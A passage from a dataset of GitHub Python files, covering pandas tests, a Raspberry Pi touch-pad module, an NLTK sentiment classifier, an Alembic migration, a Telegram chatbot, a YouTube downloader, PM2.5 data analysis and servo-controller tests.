columns=['engin_size', 'price'])\n df_true['price'] = df_true['price'].astype(int)\n\n df_out = transform_vars(data=df_in, transformation=transformation)\n\n # Test that the true and test are the same\n pd.testing.assert_frame_equal(df_true, df_out)\n\n\ndef test_transform_vars_unexpected() -> None:\n \"\"\"\n Test if `transform_vars` raises error when encountering unexpected input.\n We expect a type error when input is not a data frame.\n \"\"\"\n df_in_str = 'I am not a dataframe'\n\n with pytest.raises(TypeError):\n transform_vars(data=df_in_str, transformation=transformation)\n\n\ndef test_aggregate_by_keys_expected() -> None:\n \"\"\"\n Test if `aggregate_by_keys` works as expected.\n \"\"\"\n df_true = pd.DataFrame([[0, 'Dacia', 2018, 5.0, 5.0],\n [1, 'Ford', 2018, 7.0, 5.0],\n [2, 'Hyundai', 2018, 5.0, 4.0],\n [3, 'Jaguar', 2017, 5.0, 4.0],\n [4, 'Jaguar', 2018, 2.0, 2.0],\n [5, 'Kia', 2018, 5.0, 3.0],\n [6, 'Land Rover', 2018, 5.0, 5.0],\n [7, 'Land Rover', 2021, 5.0, 5.0],\n [8, 'MINI', 2018, 2.0, 2.0],\n [9, 'Mercedes-Benz', 2018, 5.0, 5.0],\n [10, 'Mercedes-Benz', 2021, 5.0, 5.0],\n [11, 'Mitsubishi', 2018, 5.0, 3.0],\n [12, 'Peugeot', 2018, 5.0, 5.0],\n [13, 'Renault', 2018, 5.0, 5.0],\n [14, 'Renault', 2020, 5.0, 5.0],\n [15, 'Subaru', 2018, 5.0, 5.0],\n [16, 'Volkswagen', 2018, 5.0, 5.0]],\n columns=['newcol', 'maker', 'year', 'seat_num', 'door_num'])\n\n df_out = aggregate_by_keys(\n data=df_in_2,\n aggregation=aggregation,\n new_index='newcol'\n )\n\n # Test that the true and test are the same\n pd.testing.assert_frame_equal(df_true, df_out)\n\n\ndef test_aggregate_by_keys_unexpected() -> None:\n \"\"\"\n Test if `aggregate_by_keys` raises error when encountering unexpected input.\n We expect a key error when key column does not exist.\n \"\"\"\n df_in_3 = pd.DataFrame([[0, 1, 2, 3]], columns=[\n 'col1', 'col2', 'col3', 'col4'])\n\n with pytest.raises(KeyError):\n aggregate_by_keys(\n data=df_in_3,\n aggregation=aggregation,\n new_index='newcol'\n )\n\n\ndef test_method_to_func_expected_mean() -> None:\n \"\"\"\n Test if `method_to_func` works as expected for mean.\n \"\"\"\n assert method_to_func('mean') == 'mean'\n\n\ndef test_method_to_func_expected_first() -> None:\n \"\"\"\n Test if `method_to_func` works as expected for first.\n \"\"\"\n assert method_to_func('first') == 'first'\n\n\ndef test_method_to_func_unexpected() -> None:\n \"\"\"\n Test if `method_to_func` return None when receiving unexpected input.\n \"\"\"\n assert method_to_func('not_a_method') is None\n","repo_name":"hcai98/Car-Recommender","sub_path":"tests/test_clean.py","file_name":"test_clean.py","file_ext":"py","file_size_in_byte":6650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5101812162","text":"import RPi.GPIO as GPIO\nGPIO.setmode(GPIO.BCM)\n\n#Pins= [Pad0, Pad1, Pad2, Pad3, Pad4]\nPADS = [24, 23, 18, 15, 14]\t# Touch Pad BCM Pins ; Use NoneType if Pad is not in use\n\ndef setup():\n\tglobal PADS\n\n\tfor pin in PADS:\n\t\tif (pin is not None):\n\t\t\tGPIO.setup(pin, GPIO.IN)\n\n\tprint(\"All pins have been set up successfully!\")\n\treturn True\n\n\"\"\"\nNote:\nSince only 1 Touch Pad can be used at a time, I chose to create a function which responds to the corresponding Pad.\nI also thought that we may not know which pad is being used or may just want to check all the pads so I created\nanother function which would check for which pad was activated.\n\nFilled in functions for testing purposes.\nGPIO input of each pad is HIGH when untouched. LOW when touched.\nFunctions test for when the Pad is LOW.\nAttempted to touch multiple pads and as expected, only 1 pad can be used at any given time.\n\n\nRead_Pad(input) function is used to know if Pad# is ON/OFF for use in greater applications.\n\nRead_All() function would check for which Pad# is activated when called.\n\nWait_All() function is used to implement interrupts for all the Touch Pads.\n\nWait_Pad(input) functin is used to implement an interrupt for the specified Touch Pad.\n\"\"\"\n\n\n# Read State of Pad#\ndef Read_Pad(input):\n\t\"\"\"\n\tAccepts pad # to read state.\n\tReturns Pad state\n\tState: 1 = Not Active\n\t 0 = Active\n\t None = Incorrect Pad # / Pad not setup\n\t\"\"\"\n\tglobal PADS\n\n\tif (PADS[input] is not None):\n\t\treturn GPIO.input(PADS[input])\n\treturn None\n\n# Search for which pad is activated\ndef Read_All():\n\t\"\"\"\n\tReads all pad states.\n\tReturns pad# of active pad.\n\tIf none are active, return None.\n\t\"\"\"\n\n\tfor pad in range(5):\n\t\tif (Read_Pad(pad) == 0):\n\t\t\treturn pad\n\treturn None\n\n# Create Interrupt for Pad#\ndef Wait_Pad(input):\n\tglobal PADS\n\n\tif (PADS[input] is not None):\n\t\tGPIO.add_event_detect(PADS[input], GPIO.FALLING)\n\t\tprint(\"Pad Interrupt \" + str(input) + \" setup correctly!\")\n\t\treturn True\n\tprint(\"Touch Pad \" + str(input) + \" is not setup...\")\n\treturn False\n\n\n# Create Interrupts for all Pads\ndef Wait_All():\n\tfor pad in range(5):\n\t\tWait_Pad(pad)\n\treturn True\n\n","repo_name":"LBP311/Origami-Electronics","sub_path":"touch_sensor.py","file_name":"touch_sensor.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34044896835","text":"import nltk\nimport collections\nfrom nltk.classify import NaiveBayesClassifier\nfrom nltk.metrics import precision, recall, f_measure\nimport datetime\nimport pickle\nfrom statistics import mode\nimport os\n\nfrom nltk.classify import ClassifierI\n\nclass VoteClassifier(ClassifierI):\n def __init__(self, *classifiers):\n self._classifiers = classifiers\n\n def classify(self, features):\n votes = []\n for c in self._classifiers:\n v = c.classify(features)\n votes.append(v)\n return mode(votes)\n\n def confidence(self, features):\n votes = []\n for c in self._classifiers:\n v = c.classify(features)\n votes.append(v)\n\n choice_votes = votes.count(mode(votes))\n conf = choice_votes / len(votes)\n return conf\n\n\ndef classify(features, source, type):\n dir_path = os.path.dirname(__file__)\n\n file_path = os.path.join(dir_path, source + '/pickled/' + type + '/MNB_classifier.pickle')\n open_file = open(file_path, \"rb\")\n MNB_classifier = pickle.load(open_file)\n open_file.close()\n\n file_path = os.path.join(dir_path, source + '/pickled/' + type + '/BernoulliNB_classifier.pickle')\n open_file = open(file_path, \"rb\")\n BernoulliNB_classifier = pickle.load(open_file)\n open_file.close()\n\n file_path = os.path.join(dir_path, source + '/pickled/' + type + '/LogisticRegression_classifier.pickle')\n open_file = open(file_path, \"rb\")\n LogisticRegression_classifier = pickle.load(open_file)\n open_file.close()\n\n file_path = os.path.join(dir_path, source + '/pickled/' + type + '/LinearSVC_classifier.pickle')\n open_file = open(file_path, \"rb\")\n LinearSVC_classifier = pickle.load(open_file)\n open_file.close()\n\n file_path = os.path.join(dir_path, source + '/pickled/' + type + '/NuSVC_classifier.pickle')\n open_file = open(file_path, \"rb\")\n NuSVC_classifier = pickle.load(open_file)\n open_file.close()\n\n voted_classifier = VoteClassifier(\n NuSVC_classifier,\n LinearSVC_classifier,\n MNB_classifier,\n BernoulliNB_classifier,\n LogisticRegression_classifier)\n\n return voted_classifier.classify(features), voted_classifier.confidence(features)\n\n\ndef test(trainfeats, testfeats, source, type):\n # print('train on %d instances, test on %d instances' % (len(trainfeats), len(testfeats)))\n\n my_classifier = NaiveBayesClassifier.train(trainfeats)\n refsets = collections.defaultdict(set)\n testsets = collections.defaultdict(set)\n\n for i, (feats, label) in enumerate(testfeats):\n refsets[label].add(i)\n observed = my_classifier.classify(feats)\n testsets[observed].add(i)\n\n # precision and recall\n accuracy = nltk.classify.util.accuracy(my_classifier, testfeats) * 100\n pos_prec = precision(refsets['pos'], testsets['pos']) * 100\n pos_rec = recall(refsets['pos'], testsets['pos']) * 100\n neg_prec = precision(refsets['neg'], testsets['neg']) * 100\n neg_rec = recall(refsets['neg'], testsets['neg']) * 100\n\n # round\n accuracy = round(accuracy, 1)\n pos_prec = round(pos_prec, 1)\n pos_rec = round(pos_rec, 1)\n neg_prec = round(neg_prec, 1)\n neg_rec = round(neg_rec, 1)\n\n # print('pos F-measure:', f_measure(refsets['pos'], testsets['pos']))\n # print('neg F-measure:', f_measure(refsets['neg'], testsets['neg']))\n my_classifier.show_most_informative_features(50)\n\n dir_path = os.path.dirname(__file__)\n\n file_path = os.path.join(dir_path, source + '/pickled/' + type + '/MNB_classifier.pickle')\n open_file = open(file_path, \"rb\")\n MNB_classifier = pickle.load(open_file)\n open_file.close()\n mnb = (nltk.classify.accuracy(MNB_classifier, testfeats)) * 100\n print(mnb)\n mnb = round(mnb, 1)\n\n file_path = os.path.join(dir_path, source + '/pickled/' + type + '/BernoulliNB_classifier.pickle')\n open_file = open(file_path, \"rb\")\n BernoulliNB_classifier = pickle.load(open_file)\n open_file.close()\n bnb = (nltk.classify.accuracy(BernoulliNB_classifier, testfeats)) * 100\n print(bnb)\n bnb = round(bnb, 1)\n\n file_path = os.path.join(dir_path, source + '/pickled/' + type + '/LogisticRegression_classifier.pickle')\n open_file = open(file_path, \"rb\")\n LogisticRegression_classifier = pickle.load(open_file)\n open_file.close()\n lr = (nltk.classify.accuracy(LogisticRegression_classifier, testfeats)) * 100\n print(lr)\n lr = round(lr, 1)\n\n file_path = os.path.join(dir_path, source + '/pickled/' + type + '/LinearSVC_classifier.pickle')\n open_file = open(file_path, \"rb\")\n LinearSVC_classifier = pickle.load(open_file)\n open_file.close()\n lsvc = (nltk.classify.accuracy(LinearSVC_classifier, testfeats)) * 100\n print(lsvc)\n lsvc = round(lsvc, 1)\n\n file_path = os.path.join(dir_path, source + '/pickled/' + type + '/NuSVC_classifier.pickle')\n open_file = open(file_path, \"rb\")\n NuSVC_classifier = pickle.load(open_file)\n open_file.close()\n nsvc = (nltk.classify.accuracy(NuSVC_classifier, testfeats)) * 100\n print(nsvc)\n nsvc = round(nsvc, 1)\n\n voted_classifier = VoteClassifier(\n NuSVC_classifier,\n LinearSVC_classifier,\n MNB_classifier,\n BernoulliNB_classifier,\n LogisticRegression_classifier)\n\n voted = (nltk.classify.accuracy(voted_classifier, testfeats)) * 100\n print(voted)\n voted = round(voted, 1)\n\n nltk_output = \"nlt, \" + str(accuracy) + \", \" + str(pos_prec) + \", \" + str(neg_prec) + \", \" + str(pos_rec) + \", \" + str(neg_rec) + \"\\n\"\n sklearn_output = \"skl, \" + str(mnb) + \", \" + str(bnb) + \", \" + str(lr) + \", \" + str(lsvc) + \", \" + str(nsvc) + \", \" + str(voted) + \"\\n\"\n\n return (nltk_output, sklearn_output)\n\n\nif __name__ == '__main__':\n COUNT = 60000\n cut = int((COUNT/2)*19/20)\n source = \"twitter\"\n type = \"60000\"\n\n # corpora = crp.Corpora(\"stanford\", count=COUNT)\n # features = ftr.Features(corpora, total=COUNT, bigram=True, stem=\"porter\", pos=[\"CD\"])\n\n\n dir_path = os.path.dirname(__file__)\n file_path = os.path.join(dir_path, source + '/pickled/' + type + '/NuSVC_classifier.pickle')\n features_f = open(file_path, \"rb\")\n features = pickle.load(features_f)\n features_f.close()\n\n posfeats = features.get_features_pos()\n negfeats = features.get_fearures_neg()\n\n trainfeats = negfeats[:cut] + posfeats[:cut]\n testfeats = negfeats[cut:] + posfeats[cut:]\n\n print('train on %d instances, test on %d instances' % (len(trainfeats), len(testfeats)))\n nlt, skl = test(trainfeats, testfeats)\n print(nlt, skl)","repo_name":"bromjiri/Presto","sub_path":"trainer/classifier_load.py","file_name":"classifier_load.py","file_ext":"py","file_size_in_byte":6564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32800572693","text":"from distutils.core import setup\nfrom Cython.Build import cythonize\nfrom distutils.extension import Extension\nimport numpy as np\nimport os\n\n# Add non-ROS install locations\ninclude_dirs = [\"/usr/local/include\", np.get_include()]\nlibrary_dirs = [\"/usr/local/lib\"]\n\n# Get a list of all package locations\nros_package_paths = os.environ['ROS_PACKAGE_PATH']\nfor path in ros_package_paths.split(\":\"):\n # One of these will be\n # .../catkin_ws/src/\n include_dir1 = os.path.abspath(os.path.join(path, \"../install/include\"))\n library_dir1 = os.path.abspath(os.path.join(path, \"../devel/lib\"))\n include_dir2 = os.path.abspath(os.path.join(path, \"../../install/include\"))\n library_dir2 = os.path.abspath(os.path.join(path, \"../../devel/lib\"))\n include_dirs.append(include_dir1)\n library_dirs.append(library_dir1)\n include_dirs.append(include_dir2)\n library_dirs.append(library_dir2)\n\nextensions = [\n Extension(\n \"scan_simulator_2d\",\n [\"scan_simulator_2d.pyx\"],\n libraries=[\"racecar_simulator\"],\n include_dirs=include_dirs,\n library_dirs=library_dirs,\n language='c++',\n extra_compile_args=[\"-std=c++11\", \"-O2\", \"-O3\"],\n extra_link_args=[\"-std=c++11\"]\n )]\n\nsetup(\n ext_modules=cythonize(extensions)\n)\n","repo_name":"mit-rss/localization","sub_path":"src/localization/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"14202270462","text":"#from googletrans import Translator\n\n#trans = Translator()\n#t = trans.translate(\n# 'hello', src= 'en', dest='de'\n#)\n#print(f'Source: {t.src}')\n#print(f'Destination: {t.dst}')\n#print(f'{t.origon} -> {t.text}')\nfrom deep_translator import GoogleTranslator\nimport codecs\nlangs_list = GoogleTranslator.get_supported_languages()\nlangs_dict = GoogleTranslator.get_supported_languages(as_dict=True)\nprint(langs_dict)\ntranslated = GoogleTranslator(source='auto', target='afrikaans').translate_file('C:\\\\Users\\\\CyrusSmith\\\\Desktop\\\\test\\\\Split files\\\\home-page(listreet)-en_0.html')\nprint(translated)\nf = codecs.open('C:\\\\Users\\\\CyrusSmith\\\\Desktop\\\\test\\\\Split files\\\\home-page(listreet)-af0.html', 'w', 'utf-8')\nf.write(translated)\nf.close","repo_name":"CyrusTheVirusSmith/website-page-translation","sub_path":"tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14717427069","text":"\"\"\"empty message\n\nRevision ID: af3ec20c9bb7\nRevises: \nCreate Date: 2023-03-13 16:54:55.226507\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'af3ec20c9bb7'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('blocklist',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('jti', sa.String(length=36), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n with op.batch_alter_table('blocklist', schema=None) as batch_op:\n batch_op.create_index(batch_op.f('ix_blocklist_jti'), ['jti'], unique=False)\n\n op.create_table('course',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('name', sa.String(length=45), nullable=False),\n sa.Column('teacher', sa.String(length=45), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('user',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('first_name', sa.String(length=45), nullable=False),\n sa.Column('last_name', sa.String(length=45), nullable=False),\n sa.Column('student_id', sa.String(length=15), nullable=True),\n sa.Column('email', sa.String(length=50), nullable=False),\n sa.Column('password', sa.String(length=40), nullable=False),\n sa.Column('enrollment_status', sa.Enum('ACTIVE', 'WAITLIST', 'EXPELLED', 'ADMIN', name='enrollmentstatus'), nullable=False),\n sa.Column('date_created', sa.DateTime(), nullable=True),\n sa.Column('is_admin', sa.Boolean(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email'),\n sa.UniqueConstraint('student_id')\n )\n op.create_table('score',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('score', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('course_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['course_id'], ['course.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('user_course',\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('course_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['course_id'], ['course.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], )\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('user_course')\n op.drop_table('score')\n op.drop_table('user')\n op.drop_table('course')\n with op.batch_alter_table('blocklist', schema=None) as batch_op:\n batch_op.drop_index(batch_op.f('ix_blocklist_jti'))\n\n op.drop_table('blocklist')\n # ### end Alembic commands ###\n","repo_name":"PromPromm/student-management-api","sub_path":"migrations/versions/af3ec20c9bb7_.py","file_name":"af3ec20c9bb7_.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33678462350","text":"import numpy as np\nimport string\nimport re\nimport joblib\nfrom util import JSONParser\nfrom Sastrawi.Stemmer.StemmerFactory import StemmerFactory\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\n\n# Function for Processing Chat from user\ndef chat_processing(chat):\n # Transform Chat Into Lowercase\n chat = chat.lower()\n\n # Remove Punctuation From Chat\n chat = chat.translate(str.maketrans(\"\",\"\",string.punctuation))\n\n # Remove Digit From Chat\n chat = re.sub(\"[^A-Za-z\\s']\",\" \", chat)\n\n # Remove Tab From Chat\n chat = chat.strip()\n\n # Stemmer Definition\n stemmer = StemmerFactory().create_stemmer()\n\n # Stemming Chat\n chat = stemmer.stem(chat)\n\n return chat\n\ndef response(chat, pipeline, jp):\n chat = chat_processing(chat)\n res = pipeline.predict_proba([chat])\n max_prob = max(res[0])\n if max_prob < 0.2:\n return \"Mohon maaf nih kak, aku masih belum ngerti maksud kakak :(\" , None\n else:\n max_id = np.argmax(res[0])\n pred_tag = pipeline.classes_[max_id]\n return jp.get_response(pred_tag)\n\ndef start(update, context):\n update.message.reply_text(\"Selamat!, kakak telah terhubung dengan Gitcoff, sebuah Chatbot AI dari Git Coffee 😉\")\n\ndef respons(update, context):\n chat = update.message.text\n res = response(chat, model, jp)\n update.message.reply_text(res)\n\n# Main\n# Load dataset Intents for Bot Responses\npath = \"dataset/intents.json\"\njp = JSONParser()\njp.parse(path)\ndf = jp.get_dataframe()\n\n# Initiate Bot Token from BotFather\ntoken = 'YOUR TELEGRAM BOT API TOKEN'\nupdater = Updater(token, use_context=True)\ndp = updater.dispatcher\n\n# Load Chatbot Machine Learning Model\nmodel = joblib.load(\"chatbot.pkl\")\n\n# Command\ndp.add_handler(CommandHandler(\"start\",start))\n\n# Message Handler\ndp.add_handler(MessageHandler(Filters.text, respons))\n\n# Run Bot\nupdater.start_polling()\nupdater.idle()","repo_name":"Theo1107/Git-Cofee-Chatbot","sub_path":"gitcoff_telebot.py","file_name":"gitcoff_telebot.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27280348551","text":"from tkinter import *\r\nfrom tkinter import filedialog\r\nfrom pytube import YouTube\r\nimport shutil\r\nimport os\r\n\r\n\r\nroot = Tk()\r\nroot.title(\"YouTube Downloader\")\r\n\r\n\r\ndef download_highest_res():\r\n\r\n get_url = url_enter.get() # Gets the YT URL\r\n user_path = path_label.cget(\"text\") # Gets the path the user chose\r\n root.title(\"Downloading...\")\r\n mp4_highest = YouTube(get_url).streams.get_highest_resolution().download()# Download highest resolution vid\r\n shutil.move(mp4_highest, user_path)\r\n root.title(\"Download complete!\")\r\n\r\ndef download_mpthree():\r\n get_url = url_enter.get() # Gets the YT URL\r\n user_path = path_label.cget(\"text\") # Gets the path the user chose\r\n root.title(\"Downloading...\")\r\n mpthree = YouTube(get_url).streams.filter(only_audio=True).first().download() # Download highest audio sample\r\n base, ext = os.path.splitext(mpthree)\r\n new_file = base + \".mp3\"\r\n os.rename(mpthree, new_file)\r\n shutil.move(new_file, user_path)\r\n root.title(\"Download complete!\")\r\n\r\ndef show():\r\n final = \"\"\r\n confirm_label = Label(root, text=clicked.get())\r\n final = clicked.get()\r\n custom_download(final)\r\n\r\ndef custom_download(resolution):\r\n get_url = url_enter.get() # Gets the YT URL\r\n user_path = path_label.cget(\"text\") # Gets the path the user chose\r\n root.title(\"Downloading...\")\r\n mp4_custom = YouTube(get_url).streams.filter(res=resolution).first().download()\r\n shutil.move(mp4_custom, user_path)\r\n root.title(\"Download complete!\")\r\n\r\n\r\n# Dropdown menu\r\nclicked = StringVar()\r\nclicked.set(\"choose\")\r\ndrop = OptionMenu(root, clicked, \"360p\", \"480p\", \"720p\", \"1080p\")\r\n\r\n#button to the right of the dropdown list\r\ncustom_final_download = Button(root, text=\"Confirm\", bg='grey', padx=20, pady=20, command=show)\r\n\r\n\r\n\r\ndef path_selection():\r\n path = filedialog.askdirectory() # allows user to select a path from the file explorer\r\n path_label.config(text=path)\r\n\r\n# defining stuff\r\nenter_youtube_label = Label(root, text=\"Enter a YouTube URL:\", font=('Arial',30))\r\nurl_enter = Entry(root, width=80)\r\npath_label = Label(root, text=\"Select path for the download:\\n\", font=('Arial',20))\r\npath_button = Button(root, text=\"Path\", bg='grey', padx=30, pady=20, command=path_selection)\r\ndownload_explanation = Label(root, text=\"CHOOSING A PATH IS MANDATORY\\nRed Button: Highest Resolution, Green Button: Mp3\", font=('Arial',13))\r\ncustom_label_below = Label(root, text=\"Custom Resolution? Choose Below:\\n\", font=('Arial',20))\r\nextra_bottom_space = Label(root, text=\"\\n\")\r\nextra_bottom_space2 = Label(root, text=\"\\n\")\r\ndrop.configure(bg=\"grey\")\r\n#options defined buttons\r\ndownload_button_highest = Button(root, text=\"Highest\", bg='red', padx=30, pady=20, command=download_highest_res)\r\ndownload_audio = Button(root, text=\"Audio\", bg='Green', padx=30, pady=20, command=download_mpthree)\r\n\r\n\r\n\r\n\r\n\r\n# Placing onto the screen\r\nenter_youtube_label.grid(row=1, column=1, columnspan=3)\r\nurl_enter.grid(row=2, column=1, columnspan=3)\r\npath_label.grid(row=3, column=1, columnspan=3)\r\ndownload_button_highest.grid(row=4, column=1)\r\npath_button.grid(row=4, column=2)\r\ndownload_audio.grid(row=4, column=3)\r\nextra_bottom_space.grid(row=5, column=1, columnspan=3)\r\ndownload_explanation.grid(row=6, column=1, columnspan=3)\r\ncustom_label_below.grid(row=7, column=1, columnspan=3)\r\ndrop.grid(row=8, column=1, columnspan=2)\r\ncustom_final_download.grid(row=8, column=2, columnspan=3)\r\nextra_bottom_space2.grid(row=9)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nroot.mainloop()","repo_name":"Jake-JD/YT_Downloader","sub_path":"YT_Tkinter.py","file_name":"YT_Tkinter.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74818064803","text":"# * 题目要求:\n# * 使用Pandas查看数据文件的基本信息\n# * 使用Pandas进行数据分析及可视化\n#\n# * 数据文件:\n# * 数据源下载地址:https://video.mugglecode.com/Beijing_PM.csv\n# * Beijing_PM.csv,包含了2013-2015年北京每小时的PM2.5值。每行记录为1小时的数据。\n# * 共7列数据,分别表示:\n# 1. year: 年,2013-2015\n# 2. month: 月,1-12\n# 3. day: 日,1-31\n# 4. hour: 小时,0-23\n# 5. season:季度,1-4\n# 6. PM_China: 中国环保部检测的PM2.5值\n# 7. PM_US: 美国使馆检测的PM2.5值\n\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nfilepath = 'data/data_pd/Beijing_PM.csv'\noutput_path = 'output'\n\n\ndata_pd = pd.read_csv(filepath)\n\nprint('数据基本信息:')\nprint(data_pd.info())\n\nyear_data = data_pd.groupby('year')\nyear_mean_data = year_data['PM_US'].mean()\nprint(year_mean_data)\n\nyear_mean_data.to_csv(os.path.join(output_path,'Beijing_year_mean.csv'))\n\nyear_mean_data.plot(kind='bar')\nplt.title('Beijing average PM')\nplt.tight_layout()\nplt.savefig(os.path.join(output_path,'Beijing_average_PM.png'))\n","repo_name":"xppppd/dataAnalyze_muggle","sub_path":"使用柱状图可视化 PM2.5数值.py","file_name":"使用柱状图可视化 PM2.5数值.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12115720848","text":"from app import create_app, db\nfrom config import Config\n\napp = create_app()\n\n\nclass TestConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite://'\n\n\nclass TestUserModelCase:\n def setup(self):\n self.app = create_app(TestConfig)\n self.app_context = self.app.app_context()\n self.app_context.push()\n db.create_all()\n\n def teardown(self):\n db.session.remove()\n db.drop_all()\n self.app_context.pop()\n\n\nclass TestAPI:\n def setup(self):\n app.config['TESTING'] = True\n self.app = app.test_client()\n\n def test_get_api_endpoint(self):\n r = self.app.get('/tasks')\n print(r.json[\"status\"])\n assert r.json[\"status\"] == \"success\"\n assert r.status_code == 200\n","repo_name":"Artyko/RunningList","sub_path":"RunningList/server/app_test.py","file_name":"app_test.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11870815179","text":"from unittest.mock import Mock, patch\n\nimport pytest\n\nfrom pitop.pma.common.servo_motor_registers import (\n ServoMotorS0,\n ServoMotorSetup,\n ServoRegisterTypes,\n)\n\n\n@pytest.fixture\ndef servo_controller():\n plate_interface_patch = patch(\"pitop.pma.servo_controller.PlateInterface\")\n plate_interface_patch.start()\n\n from pitop.pma.servo_controller import ServoController\n\n yield ServoController\n\n plate_interface_patch.stop()\n\n\ndef test_constructor_success(servo_controller):\n controller = servo_controller(port=\"S0\")\n assert controller.registers == ServoMotorS0\n\n\ndef test_constructor_fails_on_incorrect_port(servo_controller):\n \"\"\"Constructor fails if providing an invalid port.\"\"\"\n with pytest.raises(Exception):\n servo_controller(port=\"invalid_port\")\n\n\ndef test_set_min_pulse_width_write(servo_controller):\n \"\"\"Registers written when setting the minimum pulse width to MCU.\"\"\"\n # create instance\n controller = servo_controller(port=\"S1\")\n # setup mock\n with patch.object(controller._mcu_device, \"write_word\") as write_word_mock:\n min_pulse_width = 500\n # test\n controller.set_min_pulse_width(min_pulse_width)\n write_word_mock.assert_called_with(\n ServoMotorSetup.REGISTER_MIN_PULSE_WIDTH,\n min_pulse_width,\n signed=False,\n little_endian=True,\n )\n\n\ndef test_set_max_pulse_width_write(servo_controller):\n \"\"\"Registers written when setting the maximum pulse width to MCU.\"\"\"\n # create instance\n controller = servo_controller(port=\"S1\")\n # setup mock\n with patch.object(controller._mcu_device, \"write_word\") as write_word_mock:\n max_pulse_width = 500\n # test\n controller.set_max_pulse_width(max_pulse_width)\n write_word_mock.assert_called_with(\n ServoMotorSetup.REGISTER_MAX_PULSE_WIDTH,\n max_pulse_width,\n signed=False,\n little_endian=True,\n )\n\n\ndef test_set_pwm_frequency_read_write(servo_controller):\n \"\"\"Registers read/written when setting/reading PWM frequency to/from\n MCU.\"\"\"\n # create instance\n controller = servo_controller(port=\"S0\")\n\n pwm_frequency_value = 200\n with patch.object(controller, \"_mcu_device\") as mcu_device_mock:\n # setup r/w mocks\n write_byte_mock = mcu_device_mock.write_byte = Mock()\n read_unsigned_byte_mock = mcu_device_mock.read_unsigned_byte = Mock(\n return_value=pwm_frequency_value\n )\n\n # test\n controller.set_pwm_frequency(pwm_frequency_value)\n write_byte_mock.assert_called_with(\n ServoMotorSetup.REGISTER_PWM_FREQUENCY, pwm_frequency_value\n )\n\n assert controller.pwm_frequency() == pwm_frequency_value\n read_unsigned_byte_mock.assert_called_with(\n ServoMotorSetup.REGISTER_PWM_FREQUENCY\n )\n\n\ndef test_acceleration_mode_read_write(servo_controller):\n \"\"\"Registers read/written when setting/reading acceleration mode to/from\n MCU.\"\"\"\n # create instance\n controller = servo_controller(port=\"S0\")\n\n with patch.object(controller, \"_mcu_device\") as mcu_device_mock:\n for acceleration_mode in (0, 1):\n # setup r/w mocks\n write_byte_mock = mcu_device_mock.write_byte = Mock()\n read_unsigned_byte_mock = mcu_device_mock.read_unsigned_byte = Mock(\n return_value=acceleration_mode\n )\n\n # test\n controller.set_acceleration_mode(acceleration_mode)\n write_byte_mock.assert_called_with(\n ServoMotorS0.get(ServoRegisterTypes.ACC_MODE), acceleration_mode\n )\n\n assert controller.get_acceleration_mode() == acceleration_mode\n read_unsigned_byte_mock.assert_called_with(\n ServoMotorS0.get(ServoRegisterTypes.ACC_MODE)\n )\n\n\ndef test_acceleration_mode_fails_on_invalid_type(servo_controller):\n \"\"\"Can't set acceleration mode if provided mode has invalid type.\"\"\"\n controller = servo_controller(port=\"S0\")\n\n for acceleration_mode in (\"a\", 0.1):\n with pytest.raises(TypeError):\n controller.set_acceleration_mode(acceleration_mode)\n","repo_name":"thymjan/pi-top-Python-SDK","sub_path":"tests/test_pma_servo_controller.py","file_name":"test_pma_servo_controller.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"27446329616","text":"from pathlib import Path\nfrom setuptools import Extension\n\nclass MesonExtension(Extension):\n 